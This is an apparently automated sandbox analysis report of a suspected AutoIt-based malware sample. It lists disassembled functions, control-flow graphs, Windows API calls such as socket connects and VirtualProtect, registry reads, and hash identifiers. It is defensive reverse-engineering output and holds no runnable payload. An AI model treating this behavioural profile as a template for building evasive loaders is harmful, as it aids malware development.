17cb31-17cb43 1553->1558 1554->1558 1555->1556 1556->1551 1557 17cace 1556->1557 1557->1551 1559 17cb47-17cb4c 1558->1559 1560 17cb4e-17cb52 1559->1560 1561 17cb8a-17cb8c 1559->1561 1564 17cb54-17cb86 1560->1564 1565 17cba1-17cba5 1560->1565 1562 17cbb4-17cbd5 call 16d7e4 call 16a6f6 1561->1562 1563 17cb8e-17cb95 1561->1563 1573 17cc41-17cc50 VariantClear 1562->1573 1577 17cbd7-17cbe0 1562->1577 1563->1565 1566 17cb97-17cb9f 1563->1566 1564->1561 1567 17cba6-17cbaf call 17c235 1565->1567 1566->1567 1567->1573 1575 17cc52-17cc55 call 161693 1573->1575 1576 17cc5a-17cc5c 1573->1576 1575->1576 1576->1477 1579 17cbe2-17cbef 1577->1579 1580 17cbf1-17cbf8 1579->1580 1581 17cc38-17cc3f 1579->1581 1582 17cc26-17cc2a 1580->1582 1583 17cbfa-17cc0a 1580->1583 1581->1573 1581->1579 1585 17cc30 1582->1585 1586 17cc2c-17cc2e 1582->1586 1583->1581 1584 17cc0c-17cc14 1583->1584 1584->1582 1587 17cc16-17cc1c 1584->1587 1588 17cc32-17cc33 call 16a6f6 1585->1588 1586->1588 1587->1582 1589 17cc1e-17cc24 1587->1589 1588->1581 1589->1581 1589->1582
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                          • API String ID: 0-572801152
                                                                                                                                                          • Opcode ID: 07fc5eb340252ad42a7066b1e0062ea3ede4d5601a83d0f8ddcaf29f25927198
                                                                                                                                                          • Instruction ID: fe81dc5034f49194d57bc2c15c32441e623c56c75d14bbf482183a992510b28b
                                                                                                                                                          • Opcode Fuzzy Hash: 07fc5eb340252ad42a7066b1e0062ea3ede4d5601a83d0f8ddcaf29f25927198
                                                                                                                                                          • Instruction Fuzzy Hash: 35E19F71A00219AFDF24DFA8D881AAE77B9FF58354F14802DF949AB281E7709D41CB91
                                                                                                                                                          Function 0017BF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1591 17bf80-17bfe1 call 141970 1594 17bfe7-17bfeb 1591->1594 1595 17c21b-17c21d 1591->1595 1594->1595 1596 17bff1-17bff6 1594->1596 1597 17c21e-17c21f 1595->1597 1596->1595 1599 17bffc-17c00b call 16be14 1596->1599 1598 17c224-17c226 1597->1598 1600 17c227 1598->1600 1605 17c011-17c015 1599->1605 1606 17c158-17c15c 1599->1606 1602 17c229 call 17c235 1600->1602 1609 17c22e-17c232 1602->1609 1610 17c017-17c019 1605->1610 1611 17c01b 1605->1611 1607 17c15e-17c160 1606->1607 1608 17c16d 1606->1608 1612 17c16f-17c171 1607->1612 1608->1612 1613 17c01d-17c01f 1610->1613 1611->1613 1612->1597 1614 17c177-17c17b 1612->1614 1615 17c033-17c03e 1613->1615 1616 17c021-17c025 1613->1616 1617 17c181 1614->1617 1618 17c17d-17c17f 1614->1618 1615->1600 1616->1615 1619 17c027-17c031 1616->1619 1620 17c183-17c186 1617->1620 1618->1620 1619->1615 1621 17c043-17c05f 1619->1621 1622 17c193-17c197 1620->1622 1623 17c188-17c18e 1620->1623 1627 17c067-17c081 1621->1627 1628 17c061-17c065 1621->1628 1625 17c19d 1622->1625 1626 17c199-17c19b 1622->1626 1623->1598 1629 17c19f-17c1c9 VariantInit VariantClear 1625->1629 1626->1629 1636 17c083-17c087 1627->1636 1637 17c089 1627->1637 1628->1627 1630 17c090-17c0e5 call 13fa89 VariantInit call 141a00 1628->1630 1634 17c1e6-17c1ea 1629->1634 1635 17c1cb-17c1cd 1629->1635 1653 17c0e7-17c0f1 1630->1653 1654 17c108-17c10d 1630->1654 1640 17c1f0-17c1fe call 132570 1634->1640 1641 17c1ec-17c1ee 1634->1641 1635->1634 1639 17c1cf-17c1e1 call 132570 1635->1639 1636->1630 1636->1637 1637->1630 1650 17c0fb-17c0fe 1639->1650 1643 17c201-17c219 call 16a6f6 VariantClear 1640->1643 1641->1640 1641->1643 1643->1609 1650->1602 1655 17c103-17c106 1653->1655 1656 17c0f3-17c0fa 1653->1656 1657 17c162-17c16b 1654->1657 1658 17c10f-17c131 1654->1658 1655->1650 1656->1650 1657->1650 1661 17c133-17c139 1658->1661 1662 17c13b-17c13d 1658->1662 1661->1650 1663 17c141-17c157 call 16a6f6 1662->1663 1663->1606
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Variant$ClearInit$_memset
                                                                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                          • API String ID: 2862541840-625585964
                                                                                                                                                          • Opcode ID: 93f666e5c74bd500661aea9be32ee6e50f45a0118f1a692b0d68995804de1f35
                                                                                                                                                          • Instruction ID: 6ad0cc3963206f3a7378e614a13f45decb5421c110c3170af9c908b5f642cb47
                                                                                                                                                          • Opcode Fuzzy Hash: 93f666e5c74bd500661aea9be32ee6e50f45a0118f1a692b0d68995804de1f35
                                                                                                                                                          • Instruction Fuzzy Hash: 8B916B71A00219EBDB24DFA4D844FAEBBB8AF45714F10816EF919AB281D7709945CFE0
                                                                                                                                                          Function 00122E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00122ECB
                                                                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00122EEC
                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00122F00
                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00122F09
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$CreateShow
                                                                                                                                                          • String ID: AutoIt v3$edit
                                                                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                                                                          • Opcode ID: 17f014c7303f14ae88b60c9b4a0e9c76abc71ba63955fbe549cf409fda007d3c
                                                                                                                                                          • Instruction ID: 084794723936d770e32eeba81d861f0b64d9813919ea86c9260fe8e09547fabf
                                                                                                                                                          • Opcode Fuzzy Hash: 17f014c7303f14ae88b60c9b4a0e9c76abc71ba63955fbe549cf409fda007d3c
                                                                                                                                                          • Instruction Fuzzy Hash: 14F030705402D07ADB309BA36C88E7B3E7DE7C7F20B01401EB909A6560D27108C1CA70
                                                                                                                                                          Function 0013EB05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0013EADA,?,?), ref: 0013EB27
                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0013EADA,?,?), ref: 00194B26
                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0013EADA,?,?), ref: 00194B65
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: QueryValue$Open
                                                                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                          • API String ID: 1606891134-614718249
                                                                                                                                                          • Opcode ID: b7180d699d8790d751b6555b2467ae6ef6b17344b3c5744a01586984e669f69d
                                                                                                                                                          • Instruction ID: 386712eb1b4ddd7045709882a8d1d0bdd8d86958e12197649623e718ac06b9dd
                                                                                                                                                          • Opcode Fuzzy Hash: b7180d699d8790d751b6555b2467ae6ef6b17344b3c5744a01586984e669f69d
                                                                                                                                                          • Instruction Fuzzy Hash: 20113A71600118BFEB04ABA4ED86EFF7BBCEB14354F100059F606E61A0EB709E51DB60
                                                                                                                                                          Function 002CC140 Relevance: 7.7, APIs: 5, Instructions: 206memorylibraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 002CC27A
                                                                                                                                                          • 6CA06DE0.KERNEL32(?,002C5FF9), ref: 002CC298
                                                                                                                                                          • ExitProcess.KERNEL32(?,002C5FF9), ref: 002CC2A9
                                                                                                                                                          • VirtualProtect.KERNEL32(00120000,00001000,00000004,?,00000000), ref: 002CC2F7
                                                                                                                                                          • VirtualProtect.KERNEL32(00120000,00001000), ref: 002CC30C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ProtectVirtual$ExitLibraryLoadProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3729624760-0
                                                                                                                                                          • Opcode ID: 695741c4b4322d6fd0fa56c27fe23b0a57e45b5c255418572b7bf0c3d148f529
                                                                                                                                                          • Instruction ID: 27df908a92b07301063837dd57f5ad5d7d0abf7f91c876bee5d4909841c598e2
                                                                                                                                                          • Opcode Fuzzy Hash: 695741c4b4322d6fd0fa56c27fe23b0a57e45b5c255418572b7bf0c3d148f529
                                                                                                                                                          • Instruction Fuzzy Hash: A851E572A752524AD7219EB9CCC0B60B7A4EB5132073C073DD9EEC73C6E6E0582687A5
                                                                                                                                                          Function 00166D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00123B1E: _wcsncpy.LIBCMT ref: 00123B32
                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00166DBA
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00166DC5
                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00166DD9
                                                                                                                                                          • _wcsrchr.LIBCMT ref: 00166DFB
                                                                                                                                                            • Part of subcall function 00166D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00166E31
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3633006590-0
                                                                                                                                                          • Opcode ID: ff1306e8edbd81b26a6a0e45d05289b47d5b5da4d644dfb10b4a159b6f86d19e
                                                                                                                                                          • Instruction ID: 47793b7ce326715b09b2b5f3c6dea95d6f90e7911147066c93f0263201464ceb
                                                                                                                                                          • Opcode Fuzzy Hash: ff1306e8edbd81b26a6a0e45d05289b47d5b5da4d644dfb10b4a159b6f86d19e
                                                                                                                                                          • Instruction Fuzzy Hash: AC2103756013189ADF24BBB4EC4ABEA33ACCF12720F200556E561C30E2EF21CEE4CA54
                                                                                                                                                          Function 00179122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0017ACD3: inet_addr.WS2_32(00000000), ref: 0017ACF5
                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00179160
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 0017916F
                                                                                                                                                          • connect.WS2_32(00000000,?,00000010), ref: 0017918B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3701255441-0
                                                                                                                                                          • Opcode ID: 1a491c7ebe3a9a254247de239cf660244e1c2e095cfcae92fee52ae9d6baecf4
                                                                                                                                                          • Instruction ID: 0b55f2b355e2bfa6cd6d9fe6d356f1f354bc0668ef5edd2445ba8dcf2b452576
                                                                                                                                                          • Opcode Fuzzy Hash: 1a491c7ebe3a9a254247de239cf660244e1c2e095cfcae92fee52ae9d6baecf4
                                                                                                                                                          • Instruction Fuzzy Hash: 9921D2323006109FCB04AF68DC89F6E77A9EF59324F048019F90AAB3D2CB70EC458B51
                                                                                                                                                          Function 00123DCB Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00123F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001234E2,?,00000001), ref: 00123FCD
                                                                                                                                                          • _free.LIBCMT ref: 00193C27
                                                                                                                                                          • _free.LIBCMT ref: 00193C6E
                                                                                                                                                            • Part of subcall function 0012BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,001E22E8,?,00000000,?,00123E2E,?,00000000,?,001BDBF0,00000000,?), ref: 0012BE8B
                                                                                                                                                            • Part of subcall function 0012BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00123E2E,?,00000000,?,001BDBF0,00000000,?,00000002), ref: 0012BEA7
                                                                                                                                                            • Part of subcall function 0012BDF0: __wsplitpath.LIBCMT ref: 0012BF19
                                                                                                                                                            • Part of subcall function 0012BDF0: _wcscpy.LIBCMT ref: 0012BF31
                                                                                                                                                            • Part of subcall function 0012BDF0: _wcscat.LIBCMT ref: 0012BF46
                                                                                                                                                            • Part of subcall function 0012BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0012BF56
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                          • API String ID: 1510338132-1757145024
                                                                                                                                                          • Opcode ID: 1244e8f1861f8caf56403ea425b68d1195a23ba46bac6ef8cc627800b9aea3e4
                                                                                                                                                          • Instruction ID: 097261276631a240f289ef3092f7ec926fcaff5b5d8e3b3690d98b1de5c09fdf
                                                                                                                                                          • Opcode Fuzzy Hash: 1244e8f1861f8caf56403ea425b68d1195a23ba46bac6ef8cc627800b9aea3e4
                                                                                                                                                          • Instruction Fuzzy Hash: 53917371910229AFCF04EFA4DC919EEB7B4BF19310F544469F826EB291EB34AE15CB50
                                                                                                                                                          Function 0014413E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __getstream.LIBCMT ref: 0014418E
                                                                                                                                                            • Part of subcall function 0014889E: __getptd_noexit.LIBCMT ref: 0014889E
                                                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 001441C9
                                                                                                                                                          • __wopenfile.LIBCMT ref: 001441D9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                                                          • String ID: <G
                                                                                                                                                          • API String ID: 1820251861-2138716496
                                                                                                                                                          • Opcode ID: 9d2fc281b1aa0b66c4fc2c8da82b97af7f57f7e712c99117b488e96148842862
                                                                                                                                                          • Instruction ID: 52f95ef9281f79661ac947bb55bd8e39a818e582251821ed5292d869a8bba875
                                                                                                                                                          • Opcode Fuzzy Hash: 9d2fc281b1aa0b66c4fc2c8da82b97af7f57f7e712c99117b488e96148842862
                                                                                                                                                          • Instruction Fuzzy Hash: BF11C270D00206ABDB10BFB48C427AF3AE4AF74750F558929A415DB2A1EB74D98297A1
                                                                                                                                                          Function 0013C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
